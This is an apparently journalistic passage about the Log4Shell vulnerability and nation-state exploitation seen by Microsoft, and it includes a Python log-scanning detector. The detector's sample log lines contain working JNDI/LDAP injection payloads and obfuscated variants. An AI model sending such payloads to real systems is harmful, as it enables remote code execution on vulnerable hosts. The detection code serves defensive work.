The vulnerability, officially tagged as CVE-2021-44228 and known as Log4Shell (a few early reports also called it LogJam, a name that properly belongs to the 2015 TLS Diffie-Hellman downgrade attack), is an unauthenticated remote code execution (RCE) flaw in the Apache Log4j 2 logging library. It affects Log4j 2.0-beta9 through 2.14.1: an attacker who can get a crafted string such as a JNDI lookup into any logged field can make the library fetch and run attacker-supplied code, giving control of the host with the privileges of the logging application.
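Because the trigger is a string the application logs, the first thing most defenders did was search web and application logs for `${jndi:` and its obfuscated variants. The following detector is an added example for this article (not code from the article, BleepingComputer, or Microsoft): it percent-decodes each line, collapses the `${lower:...}`, `${upper:...}` and `${key:-default}` nesting tricks the way an attacker expects Log4j to, and flags any line that resolves to a JNDI lookup. The access-log lines at the bottom are constructed for the example, and the lookup-resolution rules are a deliberately simplified model of Log4j's substitution, not a reimplementation of it.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web logs.

Added example, not code from the article or from Microsoft. The
normalisation below models only the obfuscation tricks commonly seen in
the wild (nested lower/upper lookups, ${key:-default} shorthand, URL
encoding); it is a detection heuristic, not Log4j's real resolver.
"""
import re
from urllib.parse import unquote

# Innermost ${...} expression: no further '$', '{' or '}' inside the braces.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup is what reaches the vulnerable code path in Log4j 2.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Resolve one innermost lookup the way an attacker expects Log4j to."""
    content = match.group(1)
    if content.lstrip().lower().startswith("jndi:"):
        return match.group(0)  # keep the payload itself intact for reporting
    prefix, sep, rest = content.partition(":")
    key = prefix.strip().lower()
    if sep and key in ("lower", "upper"):
        return rest.lower() if key == "lower" else rest.upper()
    # ${key:-default} (and the ${::-x} / ${:-x} shorthand): attackers use this
    # form precisely because the key is absent, so the default is what survives.
    if ":-" in content:
        return content.partition(":-")[2]
    return match.group(0)  # unknown lookup (env, sys, date, ...): leave as-is


def url_decode(text: str, max_rounds: int = 3) -> str:
    """Undo (possibly repeated) percent-encoding seen in proxy and access logs."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups until nothing changes (bounded so it always ends)."""
    text = url_decode(text)
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every flagged log line."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1)
            if is_log4shell_probe(line)]


# Constructed sample access-log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?q=${jndi:ldap://203.0.113.99:1389/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.77/x}"',
    '198.51.100.8 - - [10/Dec/2021:12:00:03 +0000] "GET /login?u=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.77%2Fz%7D HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:04 +0000] "GET /blog/what-is-jndi HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/${version}/index.html HTTP/1.1" 404 128 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, normalized in scan(SAMPLE_LOG):
        print(f"line {number}: {normalized}")
```

The first three sample lines are flagged (the plain payload, the lower-lookup split across the User-Agent, and the percent-encoded `${::-j}` form); the two benign lines that merely mention "jndi" or contain an unrelated `${version}` placeholder are not. Treat this as detection rather than mitigation: the string can arrive in any logged field, not only the request line and User-Agent, and the fix is upgrading to a patched Log4j 2 release.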
Nation-state attackers of various sorts have pounced on the recently reported critical vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging framework.
Microsoft Threat Intelligence Center (MSTIC) observed the critical Log4j bug being exploited to drop Cobalt Strike beacons. As BleepingComputer reported, MSTIC updated its report on Tuesday to add that it had also detected nation-state activity using Log4Shell, in some cases in active attacks, by groups "originating from China, Iran, North Korea, and Turkey."
MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.
For example, MSTIC has observed PHOSPHORUS, an